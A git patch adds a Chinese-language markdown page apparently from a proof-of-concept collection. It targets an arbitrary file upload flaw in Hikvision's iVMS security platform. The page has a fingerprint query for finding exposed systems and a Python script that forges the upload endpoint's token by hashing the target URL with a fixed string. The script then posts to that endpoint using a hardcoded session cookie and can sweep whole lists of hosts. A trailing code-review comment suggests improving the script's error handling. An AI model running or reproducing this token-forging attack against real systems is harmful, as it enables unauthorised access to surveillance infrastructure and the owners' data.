From 7beb7b9037f2eef89d484474102e9fff32a2a2e0 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 9 Mar 2024 15:14:14 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E5=BA=B7=E5=A8=81=E8=A7=86iV?= =?UTF-8?q?MS=E7=BB=BC=E5=90=88=E5=AE=89=E9=98=B2=E7=B3=BB=E7=BB=9Fresourc?= =?UTF-8?q?eOperations=E6=8E=A5=E5=8F=A3=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž.md | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž.md diff --git a/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž.md b/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž.md new file mode 100644 index 0000000..8293a68 --- /dev/null +++ b/海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž.md 
@@ -0,0 +1,72 @@ +## 海康å¨è§†iVMS综åˆå®‰é˜²ç³»ç»ŸresourceOperations接å£ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž + +## 鹰图指纹 +``` +web.body="/views/home/file/installPackage.rar" +``` +![33552763e8f0dc7bf3ee49698486a07d](https://github.com/wy876/POC/assets/139549762/9b75816d-eead-4aef-9411-6cd9ecec938f) + +## poc +```python + +import requests +import urllib3 +import urllib +import hashlib +import argparse +from colorama import init +from colorama import Fore +init(autoreset=True) +urllib3.disable_warnings() + + +head = { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", + "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169" +} +def md5encode(url): + if url.endswith("/"): + path = "eps/api/resourceOperations/uploadsecretKeyIbuilding" + else: + path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding" + encodetext = url + path + input_name = hashlib.md5() + input_name.update(encodetext.encode("utf-8")) + return (input_name.hexdigest()).upper() + +def poc(url): + if url.endswith("/"): + path = "eps/api/resourceOperations/upload?token=" + else: + path = "/eps/api/resourceOperations/upload?token=" + pocurl = url + path + md5encode(url) + data = { + "service": urllib.parse.quote(url + "/home/index.action") + } + try: + response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3) + if response.status_code==200: + print(Fore.GREEN + f"[+]{url}存在海康å¨è§†iVMS 综åˆå®‰é˜²ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´žï¼ï¼ï¼ï¼") + else: + print(Fore.RED + f"[-]{url}ä¸å­˜åœ¨æµ·åº·å¨è§†iVMS 综åˆå®‰é˜²ä»»æ„æ–‡ä»¶ä¸Šä¼ æ¼æ´ž") + except: + pass + +if __name__ == '__main__': + parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt', + description='ivmsæ¼æ´žæ£€æµ‹poc', + ) + p = parser.add_argument_group('ivms çš„å‚æ•°') + p.add_argument("-u", "--url", type=str, help="æµ‹è¯•å•æ¡url") + p.add_argument("-f", "--file", type=str, help="测试多个url文件") + args = parser.parse_args() 
+ if args.url: + poc(args.url) + if args.file: + for i in open(args.file,"r").read().split("\n"): + poc(i) +``` +![7561a68dd370ef377060f8b033db4842](https://github.com/wy876/POC/assets/139549762/bf160518-070d-4953-ab47-15c5f7786b12) + +## æ¼æ´žæ¥æº +- https://mp.weixin.qq.com/s/W9cLutTOXjmplVKzEKH9Zg
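Review bot: In `poc()`, the bare `except:` followed by `pass` around `requests.post(...)` discards every timeout, TLS and connection error, so with `timeout=3` an unreachable host prints nothing and cannot be told apart from one that was never checked; catch the specific error and report it, e.g. `except requests.RequestException as e:` with `print(Fore.YELLOW + f"[!]{url} request failed: {e}")`. The `[+]` verdict rests only on `response.status_code==200`, which any catch-all, proxy or login page also returns, so the message and the write-up should present a hit as a candidate that needs manual confirmation by the asset owner, not as a confirmed finding. `urllib.parse.quote` is reached through `import urllib` alone and resolves only because `requests` happens to import the submodule; `import urllib.parse` makes the dependency explicit. In the `-f` branch, `open(args.file,"r").read().split("\n")` never closes the file and passes empty lines to `poc`; a `with open(...)` block that skips blank lines avoids both. The page also gives no affected versions, vendor advisory or remediation, which a defender reading it would need next to the fingerprint query.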